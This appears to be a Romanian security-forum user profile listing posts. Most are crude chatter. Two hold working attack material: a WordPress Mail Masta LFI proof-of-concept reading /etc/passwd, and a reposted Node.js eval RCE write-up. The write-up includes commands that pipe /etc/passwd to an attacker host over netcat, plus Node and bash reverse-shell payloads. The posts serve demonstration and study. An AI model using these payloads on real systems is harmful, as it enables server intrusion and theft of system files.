Jump to content

Webz

Active Members
  • Content count

    264
  • Joined

  • Last visited

  • Days Won

    1

Webz last won the day on April 22 2016

Webz had the most liked content!

Community Reputation

72 Excellent

1 Follower

About Webz

  • Rank
    Registered user
  • Birthday 02/02/87
  1. RST Bashed

    @aelius , Gecko mi-a dat ban acum cateva zile pe chat doar pentru ca mi-am bagat pula in el, da-mi unban, vreau sa il injur mai mult ! @fallen_angel da-mi unban moderatorule :))) @aelius Who's Chatting Sandu aelius badluck Nu ma parasi tovarase !
  2. RST Bashed

    Acel moment cand te simti atat de neimportant
  3. [+] Date: [23-8-2016] [+] Autor Guillermo Garcia Marcos [+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip [+] Title: Mail Masta WP Local File Inclusion [+] info: Local File Inclusion The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']); Source: /inc/lists/csvexport.php: Line 5: include($_GET['pl']); Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']); Source: /inc/lists/csvexport.php Line 5: include($_GET['pl']); Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']); This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server. Typical proof-of-concept would be to load passwd file: http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd Source :
  4. Web design in 4 minutes. Just click on links :3 magic
  5. Noisli.

    Noisli helps you to : Noisli.. Îl folosesc şi eu când am galagie împrejur . Mă ajută să mă relaxez , ai ce combinaţii de sunete să alegi , iar unele sunt ,,,devastatoare,,
  6. NODEJS RCE AND A SIMPLE REVERSE SHELL While reading through the blog post on a RCE on demo.paypal.com by @artsploit, I started to wonder what would be the simplest nodejs app that I could use to demo a RCE. Looking at the hello world tutorials online, I came up with the following simple app that takes a user input via the URL as a GET parameter and passes it to eval, which is obviously a bad programming practice. Obviously, the functionality of this app is questionable, but in the real world Node applications will use eval to leverage JavaScript’s eval but with sandboxing amongst other things. var express = require('express'); var app = express(); app.get('/', function (req, res) { res.send('Hello eval(req.query.q)); console.log(req.query.q); }); app.listen(8080, function () { console.log('Example listening on port 8080!'); }); To access the app, navigate to http://hostip:8080/?q='Test'. The exploit can be triggered using the q parameter. Node provides the child_process module and the eval can be used to execute the exploit. A quick demo can consist of the following steps: 1. Run nc -lvp 80 on a server you control and whose port 80 is reachable from the server running the Node app. 2. Navigate to http://hostip:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80') This will send the contents of /etc/passwd to the attacker’s nc instance. If the Node server has the traditional nc installed (instead of the openbsd alternative) you can even use -e /bin/bash to return a proper shell from the Node server. But as the case is with default installations the netcat that attacker’s love may not always be present on vulnerable machines. In such cases, the net module can be used to redirect the stdin, stdout and stderr streams to and from the attacker’s machine. The exploit code in such a case would be: var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(80, "attackerip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); To execute this, use the following steps: 1. Run nc -lvp 80 on a server you control and whose port 80 is reachable from the server running the Node app. Again, this would act as your shell listener/collector. 2. Navigate to http://hostip:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);}); You can then use /bin/bash -i or python -c 'import pty; pty.spawn("/bin/bash")' to get a proper TTY shell (See more techniques here.). I created a docker image with Node and the app installed so that this is easier to test and play with. You can setup this PoC using the following steps: 1. Install docker on your host machine. This is the standard reference – https://docs.docker.com/engine/installation/ 2. Once docker is setup, run the following command: docker run -p 8080:8080 -d appsecco/node-simple-rce 3. Navigate to the Node app by going to: http://localhost:8080/?q=’Test’ Update: A simpler reverse shell is: require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.2/80 0>%261"') According to https://github.com/bahamas10/node-exec: For backwards compatibility with child_process.exec, it is also possible to pass a string to exec. The string will automatically be converted to [‘/bin/sh’, ‘-c’, ‘{string}’], which will cause the string to be parsed on the shell. Since /bin/sh has some trouble dealing with multiple file descriptors, we can simply ask /bin/sh to spawn a new /bin/bash and use the new /bin/bash to execute our standard reverse shellcode. Whew! The code is available on Github if you want to test this locally. Feel free to make any changes to the code and redistribute! Happy Hacking! Articol preluat de pe site-ul Mi s-a parut foarte interesant acest write-up , si m-am gandit sa il postez si aici. Sper sa va inspire !
  7. POWER LEVEL Pokemon GO

    Mi-e scarba unde s-a ajuns..
  8. th1.ro, ceva idei?

    Hai sa luam fiecare domeniu si sa intrebam la ce sa il folosim. Sa fim seriosi , in pula mea gandeste-te putin la ce poti folosi domeniul ,,th1'' ... Nu e nimic sugestiv , e fix pula .
  9. 500 GB de Programare

    Mie mi-a dat PM , dar in momentul de fata functioneaza link-ul. Multumesc pentru resurse !
  10. 500 GB de Programare

    Link-ul este down ?
  11. Frans Rosén has reported hundreds of security issues using his big white hat since 2012. The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
  12. Cerere sfaturi python.

    Salut , Ca resurse / tutoriale iti mai pot recomanda cursul de pe Treehouse care este foarte detaliat si clar , iar versiunea pyhon-ului predata este versiunea 3 , care este recomandata pentru incepatori . Alte resurse folositoare : Complete python bootcamp Learn python the hard way Acum depinde ce aplicatii vrei sa creezi sau daca vrei sa te orientezi pe web ( django , flask ) , dar iti recomand si : Black hat Python Gray hat python Succes la invatat !
  13. [ REVINE ] Megaupload 2.0

    Nu stiu cat o sa tina , dar din aparente o sa se bage foarte , foarte multa lume pe site
  14. Using Web Application Firewall to detect and block common web application attacks
×